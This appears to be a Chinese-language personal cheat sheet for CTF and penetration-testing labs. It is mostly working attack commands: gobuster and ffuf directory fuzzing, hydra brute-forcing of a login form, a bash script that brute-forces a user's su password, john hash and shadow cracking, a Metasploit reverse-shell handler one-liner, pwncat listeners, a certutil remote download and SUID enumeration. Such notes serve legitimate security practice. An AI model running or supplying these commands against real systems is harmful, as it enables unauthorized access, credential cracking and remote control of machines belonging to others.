目录

gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt

gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi （带上后面的参数，指定目录）

ffuf -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.244.229/FUZZ

爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin:user=^USER^&pass=^PASS^:F=invalid" -V

su

爆破脚本加加

#!/bin/bash

# Job control: each backgrounded brute() below becomes a separate job.
# NOTE(review): under set -m, background jobs normally get their own process
# group, so the `kill -- -$$` in the trap may not reach them — confirm.
set -m #enable job control
# PID of this (parent) shell; brute() reads it to look up the parent's process group.
export TOP_PID=$$ #get the current PID
# On Ctrl-C, TERM or normal exit: drop the SIGTERM trap first (so the shell does
# not re-enter this handler from its own signal) and SIGTERM process group -$$.
# $$ is expanded when the trap is installed, not when it fires.
# NOTE(review): INT and SIGINT name the same signal; listing both is redundant.
trap "trap - SIGTERM && kill -- -$$" INT SIGINT SIGTERM EXIT #exit on trap

# https://github.com/fearside/ProgressBar/blob/master/progressbar.sh
# something to look at while waiting
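#######################################
# Redraw a 40-column progress bar on the current line.
# Arguments: $1 - number of items completed so far
#            $2 - total number of items (0 is treated as 0% instead of dividing by zero)
# Outputs:   writes "\rCracking : [####----] NN%" to stdout, no trailing newline
# Returns:   0
#######################################
function progressbar {
  local done_count=${1:-0}
  local total=${2:-0}
  local percent bar_done bar_left filled empty

  # Integer percentage; guard the division so an empty wordlist does not abort.
  if (( total > 0 )); then
    percent=$(( done_count * 100 / total ))
  else
    percent=0
  fi
  # Clamp so an overcount cannot yield a negative "remaining" width.
  if (( percent > 100 )); then percent=100; fi
  if (( percent < 0 )); then percent=0; fi

  bar_done=$(( percent * 4 / 10 ))   # 40 columns -> 0.4 columns per percent point
  bar_left=$(( 40 - bar_done ))

  # Build each segment as a run of spaces, then swap in the marker characters.
  printf -v filled '%*s' "$bar_done" ''
  printf -v empty '%*s' "$bar_left" ''

  # Data goes through %s arguments, never into the format string itself.
  printf '\rCracking : [%s%s] %d%%' "${filled// /#}" "${empty// /-}" "$percent"
  return 0
}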

#######################################
# Test one candidate for user johnsmith by driving `su` through a pseudo-tty.
# Arguments: $1 - the word read from the wordlist
# Globals:   TOP_PID (read) - PID of the parent shell
# Outputs:   on a non-failure result, prints the credentials and su's output
# Side effects: on a non-failure result, SIGKILLs the parent's whole process group
# Note: none of the variables are `local`; when run in the foreground they
# would land in the caller's scope.
#######################################
function brute() {
keyword=$1 #get the word
# Candidate = fixed prefix + word + fixed suffix.
password="PrettyS3cure${keyword}Password123." #add it to our format
# `script -qc ... /dev/null` runs su under a pty (typescript discarded); the
# sleep presumably lets su print its prompt before the password arrives on
# stdin — confirm. $password is unquoted here.
output=$( ( sleep 0.2s && echo $password ) | script -qc 'su johnsmith -c "id"' /dev/null) # check the password
# Any output that does not contain the literal substring "Authentication
# failure" is treated as success (including errors unrelated to the password).
if [[ $output != *"Authentication failure"* ]]; then #if password was correct
# NOTE(review): $password and $output are expanded inside the printf FORMAT
# string, so a '%' in either would be interpreted as a conversion.
printf "\rCreds Found! johnsmith:$password\n$output\nbye..." #print the password
# Look up the parent's process group id and SIGKILL the whole group
# (main loop, the other candidate jobs and this job).
kill -9 -$(ps -o pgid= $TOP_PID | grep -o '[0-9]*') #kill parent and other jobs
fi
}

# Main: read candidates from the wordlist given as $1, starting one background
# brute() job per line while the progress bar is drawn in the foreground.
wordlist=$1 #get wordlist as parameter

# Line count for the progress bar.
# NOTE(review): wc -l prints "N filename" and grep -o '[0-9]*' keeps every digit
# run, so a file name containing digits adds extra lines to $count.
count=$(wc -l $wordlist| grep -o '[0-9]*') #count how many words we have
current=1

# IFS= with read -r keeps each line byte-for-byte (surrounding blanks, backslashes).
while IFS= read -r line #for each line
do
# $line is unquoted: a line with spaces or glob characters is split/expanded and
# brute() only sees the first word. There is no cap on concurrent jobs — every
# line forks a new `script`/`su` pair immediately.
brute $line & #try the password
progressbar ${current} ${count} #update progress bar. TODO:calculate ETA
current=$(( current + 1 )) #increment
done < $wordlist #read the wordlist

# Block until every background brute() job has exited (or the group was killed).
wait #wait for active jobs

使用:time bash a.sh wordlist

hash解密

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online
还有这个
Hash decoder and calculator (md5hashing.net)

Binary to Text Translator (rapidtables.com)
这个是解密二进制数据的
cyberchef也是能直接秒的

RSA解密

ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

解密shadow

先把passwd和shadow那行拿出来
unshadow passwd shadow >password
john password --wordlist=/usr/share/wordlists/rockyou.txt

smb

smbclient -L ip
smbclient \\\\ip\\name

隐写

就info和extract呗

steghide extract -sf jpg

逆向文件

r2 x.elf
aaa
afl
pdf@main

strings,一下就出来了,但是很乱

ghidra图形化界面,谁让我没有ida呢

现在有ida了

gdb

gdb crackme4
info functions
b *0x0000000000400520 #打断点
run test
info registers
x/s 0x7fffffffe990 #上一步查看寄存器,这一步查看此处寄存器的值

rdp

xfreerdp /v:10.10.199.199

rdesktop 10.10.199.199

没找到好用的…

信息收集

钓鱼包等工具第一次出现的时间VirusTotal
总之用sha256sum 高搜一下

whoami历史找不到了
wp说可以ThreatBook,但是我不行了

渗透前保持个习惯吧

echo "10.10.82.45 mafialive.thm" | sudo tee -a /etc/hosts > /dev/null

解压压缩

sudo tar -czhvf wordlists.tar.gz -C /usr/share wordlists （带上符号链接压缩）

git

git log --pretty=oneline 查看所有提交

pwncat-cs

ctrl + D往返
listen -m linux port 开启多个监听
sessions id 换被控机

lcd 切换目录
download 下载
upload 上传

msf

一句话监听

msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 4444;set payload windows/meterpreter/reverse_tcp;run'

下载后渗透

windows

certutil -urlcache -f url filename

SUID

find / -user root -perm -4000 -print 2> /tmp/11



find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null